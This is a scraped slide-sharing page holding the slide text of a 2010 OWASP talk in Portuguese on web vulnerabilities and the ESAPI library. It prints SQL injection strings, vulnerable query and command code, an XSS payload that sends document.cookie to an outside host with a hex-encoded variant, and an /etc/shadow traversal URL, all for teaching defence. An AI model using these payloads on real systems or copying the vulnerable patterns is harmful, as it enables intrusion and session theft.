Global_Innovation_Tour_in_Silicon_Valley_&_RSA_2026
porOBr.global
 
redes_Ind_topologias estrutura de dados.ppt
porbacasandro2024
 
SEQUENCIA DE PARTIDA DE QUEIMADORES INDUSTRIAIS
porantonskyrda
 
Impacto das micotoxinas na alimentação de bovinos
pordavifrancisco9
 
COLHEITA, ARMAZENAMENTO, COMERCIALIZAÇÃO E INDUSTRIALIZAÇÃO DA SOJA - FELIPE ...
porGETA - UFG
 
COLHEITA, ARMAZENAMENTO, COMERCIALIZAÇÃO E INDUSTRIALIZAÇÃO DO MILHO – JULIA ...
porGETA - UFG
 
Um projeto de redes para fins educacionais
porLorran17
 
IA, Machine Learning e Deep Learning.pptx
porArlimar Jacinto
 
API e Endpoints para Google Cloud para IA
porArlimar Jacinto
 
Gerenciamento-de-Portfolio-de-Projetos.pdf
porAragon Salvador
 
Dev In The Loop - Quando e Como o Desenvolvedor Atua no Ciclo de Desenvolvime...
porDouglas Siviotti
 
MODOS DE AÇÃO DOS FUNGICIDAS - JÚLIA E DIEGO
porGETA - UFG
 
FISIOLOGIA E FENOLOGIA DO MILHO - FELIPE CRUVINEL E CAIRO
porGETA - UFG
 

AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações Web by Tarcizio Vieira Neto

  • 1.
    The OWASP Foundation http://www.owasp.org OWASPAppSec Brazil 2010, Campinas, SP Utilizando a API de segurança OWASP ESAPI (Enterprise Security API) para prover segurança em aplicações Web Tarcizio Vieira Neto SERPRO tarciziovn@gmail.com
  • 2.
    2 Objetivos do Curso •Conhecer as principais vulnerabilidades de segurança comumente encontradas em aplicações Web. • Apresentar a arquitetura da biblioteca ESAPI e o funcionamento de seus módulos com exemplos em código Java (JSP). • Apresentar o componente Web Application Firewall da ESAPI.
  • 3.
    3 Roteiro 1. Introdução 2. OWASPTop 10 3. Biblioteca OWASP ESAPI 4. Vantagens do Uso da Biblioteca ESAPI 5. Conclusões 3.1. Módulo de Validação e Codificação 3.2. Módulo de Autenticação 3.3. Módulo de Controle de Acesso 3.4. Módulo de utilitários HTTP 3.5. Módulo de tratamento de referência de acesso 3.6. Módulo de Criptografia 3.7. Módulo de Log 3.8. Módulo de Detecção de Intrusão 3.9. Integrando o módulo AppSensor com a ESAPI 3.10. Utilizando Filtros 3.11. Configurando a ESAPI 3.12. Módulo Web Application Firewall da ESAPI 1.1. Mitos relacionados à segurança em Aplicações Web 1.2. Projeto OWASP
  • 4.
    4 Introdução • Riscos desegurança em aplicações – Os atacantes podem usar diversos caminhos através da aplicação que potencialmente podem prejudicar o negócio ou a organização. – Cada um desses caminhos representa um risco que pode, ou não, ser prejudicial o suficientemente para justificar a sua atenção. Fonte: OWASP Top 10 “A risk is a path from threat agent to business impact.” (OWASP)
  • 5.
    5 Introdução Os ataques podemcausar uma série de impactos, entre os quais podemos citar: • Perdas Financeiras. • Transações Fraudulentas. • Acesso não autorizado a dados, inclusive confidenciais. • Roubo ou modificação de Dados. • Roubo de Informações de Clientes. • Interrupção do Serviço. • Perda da confiança e lealdade dos clientes. • Dano à imagem da organização.
  • 6.
    6 Introdução • Sofisticação dosAtaques X Conhecimento Necessário Fonte: Carnegie Mellon University Software Engineering Institute
  • 7.
    7 Introdução Conceitos Básicos: • Análiseestática de segurança – Consiste em verificar o código fonte por meio de ferramentas especializadas, sem a necessidade de que a aplicação esteja em execução. – Ferramentas de análise estática são direcionadas a identificação de divergências do código quanto aos padrões de melhores práticas de segurança. – O próprio desenvolvedor deve realizar esta atividade durante a implementação, de forma a corrigir os desvios logo no início do ciclo de vida.
  • 8.
    8 Introdução Conceitos Básicos: • Ciclotradicional de Revisão de Código: – Priorizar qual o código fonte será inspecionado. »entrada e saída de dados; acesso ao banco de dados; – Executar a ferramenta de análise estática. – Realizar um revisão manual do código com base no resultado da ferramenta. –Corrigir o código vulnerável.
  • 9.
    9 Introdução Conceitos Básicos: • Evidências:apontamentos ou batimentos que as ferramentas encontram em um código-fonte, identificando possíveis falhas ou vulnerabilidades. • Falso Positivo: ocorre quando a ferramenta aponta uma vulnerabilidade que não pode ser explorada ou que foi tratada. • Falso negativo: ocorre quando a ferramenta não aponta uma vulnerabilidade que na realidade existe e pode ser explorada. • Vulnerabilidade: fragilidade de um sistema que pode ser explorada por um exploit. • Exploração(exploit): é uma ação maliciosa concretizada. Em um ataque, uma ameaça explora uma vulnerabilidade.
  • 10.
    10 Introdução Conceitos Básicos: • Blacklist:método de validação que consiste em bloquear todas as entradas de dados consideradas explicitamente inválidas. • WhiteList: método de validação que consiste em bloquear todas as entradas de dados, exceto as que seguirem o padrão explicitamente definido como válido. • Caixa branca: testes do código fonte realizados no momento da codificação para identificar problemas de segurança. • Caixa preta: testes da aplicação em execução realizados em um ambiente controlado, pois simula situações reais de ataques.
  • 11.
    11 Introdução  Mitos relacionados àsegurança em Aplicações Web 1 - “estamos seguros porque temos um firewall!”  É muito comum criar um falso sentimento de segurança pelo fato da aplicação ter um firewall como entreposto. − Apenas firewalls de aplicação (ou firewall de camada 7) poderiam fornecer um nível de segurança mais adequado. − Ainda que se tenha um firewall de aplicação, alguns detalhes só podem ser implementados na própria aplicação.  Segundo o Gartner Group, 75% dos ataques acontecem na camada de aplicação.  Segundo o NIST, 92% das vulnerabilidades estão no software. National Institute of Standards and Technology
  • 12.
    12 Introdução  Mitos relacionados àsegurança em Aplicações Web 2 - “estamos seguros porque utilizamos SSL”  O SSL somente provê a confidencialidade e a integridade dos dados trafegados. – De fato não soluciona os problemas relativos às demais vulnerabilidades no servidor e no browser.
  • 13.
    13 Introdução  Mitos relacionados àsegurança em Aplicações Web 2 - “estamos seguros porque utilizamos SSL” • Deste modo, podemos ter a execução de um “ataque seguro”, ou seja, requisições maliciosas são enviadas para o servidor sobre o protocolo HTTPs:
  • 14.
    14 Introdução  Projeto OWASP Sobre aOWASP (Open Web Application Security Project), temos que: • É uma iniciativa aberta para tratar aspectos de segurança de aplicações web • Congrega especialistas e voluntários, que inclui corporações, organizações educacionais e pessoas de todo o mundo • A comunidade trabalha para criar artigos, metodologias, documentação, ferramentas e tecnologias para a segurança das aplicações web. • Cria documentos de boas práticas e promove o desenvolvimento de ferramentas de segurança.
  • 15.
    15 Introdução  Projeto OWASP A OWASP •Não é afiliada a nenhuma empresa de tecnologia, pois, considera a liberdade quanto a pressões organizacionais um meio de fornecer de forma imparcial informações sobre segurança de aplicações. Fonte: www.owasp.org
  • 16.
    16 Introdução  Projeto OWASP Principais projetosda OWASP: • AntiSamy • Stinger • ESAPI • WebGoat • WebScarab • Development Guide • Testing Guide • CLASP • ASVS
  • 17.
  • 18.
    18 OWASP Top 10 AOWASP produz uma publicação chamada OWASP Top 10, onde lista as 10 principais vulnerabilidades que afetam os sistemas Web. Sobre a publicação: • É lançada a cada 3 anos. • A versão mais recente foi lançada em abril de 2010. • O Top 10 não trata somente como evitar as vulnerabilidades, mas também trata sobre gerenciamento de riscos. • Para gerenciar estes riscos, as organizações precisam além de ações de sensibilização, testes de aplicação e correção, um programa de gestão de riscos de aplicações. • As versões anteriores são de 2004 e 2007. Fonte: OWASP Top 10
  • 19.
    19 OWASP Top 10 A1:Injection / Falha de Injeção A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session Management / Falha na autenticação e no gerenciamento de sessão A4: Insecure Direct Object References / Referência Insegura de Objetos A5: Cross-Site Request Forgery (CSRF) A6: Security Misconfiguration / Configuração de segurança deficiente A7: Insecure Cryptographic Storage / Armazenamento criptográfico inseguro A8: Failure to Restrict URL Access / Falha ao restringir o acesso às URLs A9: Insufficient Transport Layer Protection / Proteção ineficaz da camada de transporte A10: Unvalidated Redirects and Forwards / Redirecionamentos inseguros Versão 2010 Fonte: OWASP Top 10
  • 20.
    20 OWASP Top 10 Fonte:OWASP Top 10 Fonte: OWASP Top 10
  • 21.
    21 OWASP Top 10  A1:Falhas de Injeção Características: • Ocorrem quando dados não confiáveis são enviados para um interpretador como parte de um comando ou consulta (query) • Os dados do ataque podem iludir o interpretador a executar comandos indesejáveis ou acessar dados de forma não autorizada. • Os ataques de SQL Injection, baseiam-se na tentativa de utilizar os parâmetros de entrada da aplicação para inserir sequências de caracteres com finalidades maliciosas. • Causados também por falta ou falha na validação de entrada de dados
  • 22.
    22 OWASP Top 10  A1:Falhas de Injeção Podem ser do tipo: • SQL Injection (mais comum) • XPATH Injection • LDAP Injection, • linguagens de script web • Comand Injection (tem como alvo o sistema operacional do servidor) • Injection into SOAP • SMTP Command Injection → Os princípios são os mesmos, o que muda é a tecnologia.
  • 23.
    23 OWASP Top 10  A1:Falhas de Injeção Como evitar: • Os dados não confiáveis devem estar separados dos comandos (interpretadores) e de consultas. • Realizar a validação de entrada de dados positiva ou por Lista Branca (whitelist), com uma adequada normalização dos dados. • Realizar o tratamento dos parâmetros provenientes dos usuários ao realizar a concatenação dos dados
  • 24.
    24 OWASP Top 10  A1:Falhas de Injeção Cenário de ataque: String userID = request.getParameter("userID"); Statement statement = connection.createStatement( "SELECT * FROM accounts WHERE user_id = '"+ userID +"';"); ResultSet rs = statement.executeQuery(); A requisição pode ser enviada da seguinte forma: http://example.com/app/accountView?userID=0'+or+1=1-- Resultado da concatenação: SELECT * FROM accounts WHERE user_id = '0' or 1=1--';
  • 25.
    25 OWASP Top 10  A1:Falhas de Injeção Cenário de ataque: String userID = request.getParameter("user"); String password = request.getParameter("password"); Statement statement = connection.createStatement( "SELECT * FROM accounts WHERE "+ "user_id = '"+ userID +"' AND "+ "password = '"+ password +"';"); ResultSet rs = statement.executeQuery(); Resultado da concatenação: SELECT * FROM accounts WHERE user_id = 'admin' or 1=1--' AND password = 'anything';
  • 26.
    26 OWASP Top 10  A1:Falhas de Injeção Outros exemplos de injeções de código maliciosas: '; DROP TABLE accounts;-- SELECT * FROM accounts WHERE user_id = ''; DROP TABLE accounts;--'; '; INSERT INTO accounts (user_id, password) VALUES ('me','123456');-- SELECT * FROM accounts WHERE user_id = ''; INSERT INTO accounts (user_id, password) VALUES ('me','123456');--';
  • 27.
    27 OWASP Top 10  A1:Falhas de Injeção Outros exemplos de injeções de código maliciosas: admin'-- ' or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a
  • 28.
    28 OWASP Top 10  A1:Falhas de Injeção Como evitar: • Uso de bind variables através de PreparedStatement String userID = request.getParameter("userID"); PreparedStatement prepStmt = con.prepareStatement("SELECT * FROM accounts WHERE user_id = ?"); prepStmt.setString(1, userID); ResultSet rs = prepStmt.executeQuery();
  • 29.
    29 OWASP Top 10  A1:Falhas de Injeção Como evitar: • Uso de stored procedures String username = request.getParameter("username"); String passwd= request.getParameter("password"); CallableStatement cs = con.prepareCall("{call sp_usuario(?,?)}"); cs.setString(1, username); cs.setString(2, passwd); ResultSet results = cs.executeQuery(); CREATE PROCEDURE sp_usuario @USER varchar(16), @PASSWD varchar(16) As SELECT * FROM accounts WHERE user_id = @USER AND password = @PASSWD Go Invocando Stored Procedures Definindo Stored Procedures *Obs.: Consultas dinâmicas com stored procedures podem ser vulneráveis
  • 30.
    30 OWASP Top 10  A1:Falhas de Injeção Como evitar: • Uso de parâmetros identificados em consultas HQL Query safeHQLQuery = session.createQuery( "from accounts where userID=:userID"); safeHQLQuery.setParameter("userID", request.getParameter("userID"));
  • 31.
    31 OWASP Top 10  A1:Falhas de Injeção Como evitar: • Evitar que caracteres especiais sejam interpretados • Realizar a codificação dos dados –A seguir um exemplo de código utilizando a biblioteca ESAPI String user = ESAPI.encoder().encodeForSQL( Codec.MySQLCodec, request.getParameter("user")); String pwd = ESAPI.encoder().encodeForSQL( Codec.MySQLCodec, request.getParameter("password")); String query = "SELECT * FROM accounts "+ "WHERE user_id = '" + user + "' and passwd = '" + pwd + "'";
  • 32.
    32 OWASP Top 10  A1:Falhas de Injeção Como evitar:  Aplicar o Princípio do menor privilégio: –Usuário usado para conectar no banco de dados deve possuir apenas os privilégios mínimos necessários  Validar entrada de dados pelo método white list –Sempre –Validar tamanho, tipo, etc –Validar usando lista ou expressão regular definindo o que é permitido
  • 33.
    33 OWASP Top 10  A1:Falhas de Injeção Como evitar:  Validar entrada de dados pelo método white list com ESAPI Validator.SafeString=^[p{L}p{N}.]{0,1024}$ Validator.Email=^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+.[a-zA-Z]{2,4}$ Validator.IPAddress=^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9] [0-9]?)$ Validator.URL=^(ht|f)tp(s?)://[0-9a-zA-Z]([-.w]*[0-9a-zA-Z])*(:(0-9)*)*(/?)([a-zA-Z0- 9-.?,:'/+=&amp;%$#_]*)?$ Validator.CreditCard=^(d{4}[- ]?){3}d{4}$ Validator.SSN=^(?!000)([0-6]d{2}|7([0-6]d|7[012]))([ -]?)(?!00)dd3(?!0000)d{4}$ String nome = ESAPI.validator().getValidInput( "validacaoActionXPTO", //contexto da operação request.getParameter("nome"),//dados de entrada "validator.SafeString", //identificador da expressão regular 1024, //indica o número máximo de caracteres false //flag que informa se deve ou não aceitar valores nulos );
  • 34.
    34 OWASP Top 10  A1:Falhas de Injeção (SO) Como evitar: • Aplicação usa dados enviados pelo usuário para gerar um comando que é passado ao sistema • Se não for feito corretamente o usuário poderá injetar comandos e executá-los com as mesmas permissões da aplicação $dominio = param(‘dominio'); $nslookup = "/path/to/nslookup"; print header; if (open($fh, "$nslookup $dominio|")) { while (<$fh>) { print escapeHTML($_); print "<br>n"; } close($fh); } Aplicação realiza um DNS lookup para um domínio passado pelo usuário
  • 35.
    35 OWASP Top 10  A1:Falhas de Injeção Como evitar (de modo geral):  Valide sempre a entrada de dados – Nunca procure por caracteres indesejáveis (black list) – Aceite somente os caracteres que forem válidos para a entrada de dados  Sempre faça a validação no lado do servidor – Javascripts podem ser desabilitados no browser!  Nunca confie na entrada de dados –Valide a entrada de dados mesmo que a origem seja teoricamente confiável  Trate os campos de entrada como string
  • 36.
    36 OWASP Top 10  A2:Cross-Site Scripting (XSS) Características: • As falhas XSS ocorrem sempre que uma aplicação obtém dados fornecidos pelo usuário (não confiáveis) e os envia para um navegador web sem realizar o processo de validação ou codificação daquele conteúdo de modo conveniente. • O XSS permite aos atacantes executarem scripts no navegador da vítima, que pode sequestrar sessões de usuário, modificar a aparência de sites Web e redirecionar o usuário para sites maliciosos. Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
  • 37.
    37 OWASP Top 10  A2:Cross-Site Scripting (XSS) Tipos: • Persistente • Não Persistente • Baseado no DOM (Document Object Model)
  • 38.
    38 OWASP Top 10  A2:Cross-Site Scripting (XSS) –XSS Persistente Cenário de ataque: • Dados enviados por usuários são armazenados e posteriormente mostrados para outro ou outros usuários sem que sejam codificados • Podem atingir grandes quantidades de usuários (blogs, forums) • Dados armazenados (banco de dados, arquivo, etc) • Sem validar entrada de dados • Sem codificar saída de dados
  • 39.
    39 XSS Persistente Fonte: “SegurançaWeb: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
  • 40.
    40 OWASP Top 10  A2:Cross-Site Scripting (XSS) –XSS Não Persistente Cenário de ataque: • Dado enviado por usuário ao servidor é enviado de volta ao usuário na resposta do servidor. • Caso haja código em meio a esses dados, ele pode ser executado no browser do cliente
  • 41.
    41 XSS Não Persistente Fonte:“Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
  • 42.
    42 OWASP Top 10 <inputname ='name' type='TEXT' value='" + <%= request.getParameter("paramName") %>+"'"> • A2: Cross-Site Scripting (XSS) –XSS Não Persistente Cenário de ataque: • A aplicação usa dados não confiáveis na construção dos tags HTML sem realizar a codificação dos dados, conforme o exemplo a seguir: • A URL inclui um script no parâmetro da aplicação http://www.example.com/view.jsp?nome="<script>alert(document.cookie)</script>"
  • 43.
    43 OWASP Top 10  A2:Cross-Site Scripting (XSS) –XSS Baseado no DOM Cenário de ataque: • O código que executa no browser do usuário utiliza elementos do DOM sem fazer as verificações necessárias. • Falha no código que executa no lado cliente – Neste caso não ocorre falha no lado servidor (camada de controle/negócio)
  • 44.
    44 XSS Baseado noDOM Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
  • 45.
    45 OWASP Top 10  A2:Cross-Site Scripting (XSS) Para evitar XSS: • Validar os dados fornecidos para a aplicação –Cabeçalhos –Cookies –Dados de formulários –Campos escondidos • Codificar os dados recebidos pela aplicação antes de utilizar ou armazená-los –Usar escape codes HTML: &lt &gt &#40 &#41
  • 46.
    46 OWASP Top 10  A2:Cross-Site Scripting (XSS) O problema da codificação dupla (double encoding): Ex: Char Hex encode Then encoding '%' Double encode “<” “%3C” “%25” “%253C” “/” “%2F” “%25” “%252F” “>” “%3E” “%25” “%253E” <script>alert('XSS')</script> %253Cscript%253Ealert('XSS')%253C%252Fscript%253E
  • 47.
    47 OWASP Top 10  A2:Cross-Site Scripting (XSS) Quando um usuário malicioso submete uma URL como: Este ataque pode ser submetido também em hexadecimal, burlando um sistema de validação tradicional (blacklist): http://exemplo.com/formulario.jsp?nome="<script>document.location= 'http://www.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>" http://exemplo.com/formulario.jsp?nome=%22%3e%3%73%63%72%69%70%74 %3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e %3d%27%68%74%74%70%3a%2f%2f77%77%77%2e63%67%69%73%65%63 %75%72%69%74%79%2e%63%6f%6d%2f63%67%69%2d%62%69%6e%2f%63 %6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65 %6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
  • 48.
    48 OWASP Top 10  A2:Cross-Site Scripting (XSS) Exemplo de métodos da ESAPI que auxiliam na proteção contra XSS: String codificada = ESAPI.encoder().encodeForHTML( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForHTMLAttribute( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForJavaScript( request.getParameter( “parametro1" ) ); String codificada = ESAPI.encoder().encodeForCSS( request.getParameter ( “parametro1" ) ); String codificada= ESAPI.encoder().encodeForURL( request.getParameter ( “parametro1" ) );
  • 49.
    49 OWASP Top 10  A2:Cross-Site Scripting (XSS) Como evitar:  Como usar a ESAPI para realizar a codificação dos dados nas páginas JSP: <p> Nome <%= ESAPI.encoder() .encodeForHTML(request.getParameter("username")) %> </p>
  • 50.
    50 OWASP Top 10  A2:Cross-Site Scripting (XSS) Como evitar (outras formas):  A JSF facilita o processo de encoding dos dados a serem exibidos através das tags (<h:outputText />), da seguinte forma: <h:outputText value="#{bean.name}" /> <p>Nome do usário: #{bean.name}</p> obs.: desta forma será criado um tag implícito do tipo <h:outputText/>
  • 51.
    51 OWASP Top 10  A2:Cross-Site Scripting (XSS) Formas inseguras: <p> Nome <%= request.getParameter("username") %> </p> <h:outputText value="#{param.name}" escape="false"> obs.: neste caso o desenvolvedor estaria explicitamente desativando o tratamento dos dados. <h:outputText value="#{bean.name}" escape="false"> obs.: neste caso mesmo desativando o escaping (codificação dos dados) a exibição é segura por se tratar de um bean de entidade!
  • 52.
    52 OWASP Top 10  A3:Falha na autenticação e no gerenciamento de sessão Características: • As funções de uma aplicação relacionadas com autenticação e gestão de sessões são muitas vezes implementadas de forma incorreta, permitindo que os atacantes comprometam senhas, chaves, identificadores de sessão ou ainda venham explorar outras falhas de implementação para assumirem a identidade de outros usuários.
  • 53.
    53 OWASP Top 10  A3:Falha na autenticação e no gerenciamento de sessão Questões a verificar: 1. As credenciais sempre são protegidas quando armazenadas utilizando hashing ou criptografia? 2. As credenciais podem ser adivinhadas ou sobrepostas através de funções inadequadas no gerenciamento da conta? ex.: criação da conta, mudança de senha, recuperação de senha, identificadores de sessão de sessão fracos. 3. Os identificadores de sessão são expostos na URL? ex.: reescrita de URL. 4. Os identificadores de sessão são vulneráveis à ataques de fixação de sessão? 5. Os identificadores de sessão são desconectados após um determinado período de inatividade e os usuários tem opção para efetuar o logout? 6. Os identificadores de sessão são alterados após a autenticação bem sucedida? 7. As senhas, os identificadores de sessão e outras credenciais são enviadas através de conexões SSL/TLS?
  • 54.
    54 OWASP Top 10  A3:Falha na autenticação e no gerenciamento de sessão Como evitar: • Um único modelo de controles para autenticação e gerenciamento de sessão. Estes controles devem ser capazes de: – Atender todos os requisitos para autenticação e gerenciamento de sessão definidos nas áreas V2 (Autenticação) e V3 (Gerenciamento de Sessão) do Application Security Verification Standard (ASVS) publicado pela OWASP. – Fornecer uma interface simples para os desenvolvedores. Considere os módulos ESAPI Authenticator e ESAPI User como bons exemplos para emular, utilizar ou realizar o desenvolvimento baseado nesta biblioteca. • Esforços devem ser tomados para evitar a ocorrência de falhas de XSS que podem ser utilizados para realizar o furto dos identificadores de sessão.
  • 55.
    55 OWASP Top 10  A3:Falha na autenticação e no gerenciamento de sessão Cenários de Ataques: 1. A aplicação insere os identificadores de sessão na URL: 2. O procedimento de timeout da aplicação não é adequadamente parametrizado. 3. Um atacante consegue ter acesso a base de dados contendo os registros com as senhas de acesso ao sistema. Caso as senhas não estiverem criptografadas ou estiverem armazenadas utilizando algoritmo de hash fraco, todas as senhas dos usuários do sistema estarão expostas para o atacante. http://example.com/sales;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii
  • 56.
    56 OWASP Top 10  A2:Falha na autenticação e no gerenciamento de sessão Como evitar:  Utilizar a biblioteca ESAPI para verificar: – Se o usuário já está autenticado – Se autenticado verificar se não está bloqueado ou se o tempo de timeout de sessão não expirou – É recomendável que o trecho de código a seguir que realiza estas verificações para as páginas que requerem autenticação esteja implementado na forma de um Filtro Java try { ESAPI.authenticator().login(request, response); } catch( AuthenticationException e ) { }
  • 57.
    57 OWASP Top 10  A4:Referência Insegura de Objetos Características: • Uma referência direta a um objeto ocorre quando um programador expõe uma referência para um objeto interno da implementação, como: –Arquivo –Diretório –Chave de uma tabela no banco de dados –URL –Parâmetro de formulário
  • 58.
    58 OWASP Top 10  A4:Referência Insegura de Objetos  Sem uma verificação de controle de acesso ou outra proteção semelhante, os atacantes podem manipular estas referências para acessar informações ou outros objetos não-autorizados. URL gerada pela aplicação: URL adulterada: http://www.example.com/visualiza_info_conta.jsp?userId="4325110" ← acesso legítimo http://www.example.com/visualiza_info_conta.jsp?userId="5432112" ← acesso indevido
  • 59.
    59 OWASP Top 10  A4:Referência Insegura de Objetos  O exemplo de código a seguir mostra como geralmente é realizado um controle por referências diretas para permitir o acesso a determinado arquivo: URL gerada pela aplicação: URL adulterada: http://www.example.com/downloadFile.do?filePath="/opt/docs/file1.doc" http://www.example.com/downloadFile.do?filePath="/opt/docs/file2.doc" http://www.example.com/downloadFile.do?filePath="/etc/shadow" String filePath = "/opt/docs/file1.doc"; String href = "http://www.example.com/downloadFile.do?filePath="" + filePath + """
  • 60.
    60 OWASP Top 10  A4:Referência Insegura de Objetos Como evitar: • Evite expor referências a objetos internos. • Valide referências a objetos internos usando lista de nomes válidos • Use índices ou mapas de referência para evitar a manipulação de parâmetros
  • 61.
    61 OWASP Top 10  A4:Referência Insegura de Objetos Como evitar: • Use índices ou mapas de referência para evitar a manipulação de parâmetros String filePath = "/opt/myapp/docs/file1.doc"; AccessReferenceMap arm = new RandomAccessReferenceMap(); String indRef = arm.addDirectReference( (String) filePath ); String href = "http://www.example.com/pagina_exemplo?fileRef="" + indRef + """;
  • 62.
    62 OWASP Top 10  A4:Referência Insegura de Objetos URL gerada: http://www.example.com/pagina_exemplo?fileRef="abMa27" try { String indRef = request.getParameter( “fileRef” ); String filePath = (String) arm.getDirectReference( indRef ); File file = new File (filePath); // ... instruções que executam operações sobre o objeto File recuperado } catch (AccessControlException ace) { // se a referência indireta não existe, então provavelmente é um ataque // e o método getDirectReference lança uma exceção do tipo // AccessControlException }
  • 63.
    63 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Características: • Um ataque CSRF força o navegador de uma vítima que tenha uma sessão ativa a enviar uma requisição HTTP forjada para uma aplicação Web vulnerável. – A requisição é pré-autenticada e inclui o cookie de sessão e outras informações da sessão, como informação de autenticação. • Esta falha permite ao atacante forçar o navegador da vítima a criar requisições que a aplicação vulnerável aceite como requisições legítimas oriundos do computador da vítima.
  • 64.
    64 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Fonte: “Segurança Web: Técnicas para Programação Segura de Aplicações”, AppSec Brasil, 2009
  • 65.
    65 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Soluções ineficazes: • Aceitar apenas POST –Dificulta mas não resolve »Evita ataques por endereço de imagem –Javascript pode realizar POST –Flash pode realizar POST
  • 66.
    66 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Soluções ineficazes: • Verificação de “Referer” –Alguns firewalls modificam o “Referer” –Flash pode fazer spoofing do “Referer” –Há casos em que o browser não envia o “Referer”
  • 67.
    67 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Como evitar: • Usar parâmetro que não pode ser adivinhado pelo atacante • Formas: – Token Secreto → mais fácil e mais recomendável – Requisitar senha nas operações sensíveis
  • 68.
    68 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Como evitar: • Token secreto. – São associados à sessão do usuário – Os tokens (teoricamente) não podem ser adivinhados pelo atacante – Duas formas de implementar: » A aplicação passa o token em hidden fields nas páginas de resposta e o usuário envia token a cada requisição » A aplicação adiciona o token nos parâmetros das requisições ex: http://example.com/action?param=1&ctoken=8FD4B2
  • 69.
    69 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) • Adicionando token em hidden field. • Adicionando o token nos parâmetros das requisições <input name="csrf_field" type="HIDDEN" value='<%= ESAPI.httpUtilities().getCSRFToken() %>' /> String url = ESAPI.httpUtilities().addCSRFToken( "http://example.com/action?param1=1"); http://example.com/action?param=1&ctoken=8FD4B2
  • 70.
    70 OWASP Top 10  A5:Cross-Site Request Forgery (CSRF) Como evitar: • Requisitar Senha – Os atacantes (teoricamente) não conhecem a senha – Solicitar a senha em todas as requisições »Atrapalha a usabilidade »A aplicação deve requisitar apenas para operações sensíveis
  • 71.
    71 OWASP Top 10  A6:Configuração de segurança deficiente Características: • A segurança depende também da existência de configurações seguras específicas definidas e usadas na aplicação, frameworks, servidor de aplicação, servidor de Web e plataforma. • Todas as configurações devem ser definidas, implementadas e mantidas por que muitas vezes elas não vem aplicadas diretamente do fornecedor com padrões de segurança definidos. • Isto inclui também possuir todo o software atualizado, incluindo todas as bibliotecas de código usadas pela aplicação. • Tem mais ligação com o ambiente de produção do que com o código da aplicação.
  • 72.
    72 OWASP Top 10  A6:Configuração de segurança deficiente Como evitar: • Verificando os seguintes itens: – Existe algum processo de atualização das últimas versões e patches de todo o software para o seu ambiente? Isto inclui o sistema operacional, servidor de aplicações Web, SGBD e demais bibliotecas. –Tudo aquilo que não é necessário está desabilitado, removido, ou não instalado (por ex: portas, serviços, páginas, contas, etc)? –As contas por padrão estão desabilitadas ou foram alteradas? –Todas as configurações de segurança estão definidas corretamente? –Todos os servidores estão protegidos por Firewalls/Filtros, etc?
  • 73.
    73 OWASP Top 10  A6:Configuração de segurança deficiente Como evitar: • Estabelecer: –Um processo robusto e repetitivo que torne fácil e rápido o desenvolvimento de outro ambiente que esteja fechado/guardado. Os ambientes de desenvolvimento, garantia da qualidade e produção deverão estar todos configurados da mesma maneira. Este processo deverá ser automatizado para minimizar os esforços necesários para implementar um novo ambiente seguro. –Uma arquitetura robusta que forneça uma boa separação e segurança entre os componentes. –Executar escaneamentos e realizar auditorias periodicamente para auxiliar na detecção de configuração deficiente.
  • 74.
    74 OWASP Top 10  A7:Armazenamento criptográfico inseguro Características: • Muitas aplicações Web não protegem devidamente dados sensíveis, como números dos cartões de créditos, dados pessoais e credenciais de autenticação com algoritmos de cifra ou de resumo (hash). • Os atacantes podem roubar ou modificar estes dados, protegidos de forma deficiente, para realizar roubos de identidade, fraude com cartões de crédito ou outros crimes.
  • 75.
    75 OWASP Top 10  A7:Armazenamento criptográfico inseguro Como evitar: • Para todos dados sensíveis devemos assegurar que: –Sejam criptografados nos locais onde são armazenados a longo prazo, especialmente nos backups de dados. –Somente usuários autorizados podem acessar as cópias dos dados decriptografados. –Um padrão de algoritmo de criptografia forte (preferencialmente os recomendados pelo e-ping e ICP-Brasil) esteja sendo utilizado. –Uma chave forte tenha sido gerada, protegida contra acesso não autorizado e que a troca das chaves seja planejada.
  • 76.
    76 OWASP Top 10  A7:Armazenamento criptográfico inseguro Como evitar: • Utilizar o módulo Encryptor da biblioteca ESAPI para realizar a criptografia de dados sensíveis, utilizando parâmetros de criptografia que envolvem algoritmos adequados e chaves fortes guardadas em um arquivo de configuração protegido: String secret = "Secret Message"; CipherText encrypted = ESAPI.encryptor() .encrypt( new PlainText( secret ) ); PlainText decrypted = ESAPI.encryptor().decrypt( encrypted );
  • 77.
    77 OWASP Top 10  A8:Falha ao restringir o acesso às URLs Observações: • Muitas aplicações Web verificam os direitos de acesso a uma URL antes de exibirem links e botões protegidos. • As aplicações devem realizar verificações de controles de acesso semelhantes cada vez que estas páginas são acessadas. Caso contrário, os atacantes podem forjar URLs e acessar estas páginas escondidas, sem qualquer controle.
  • 78.
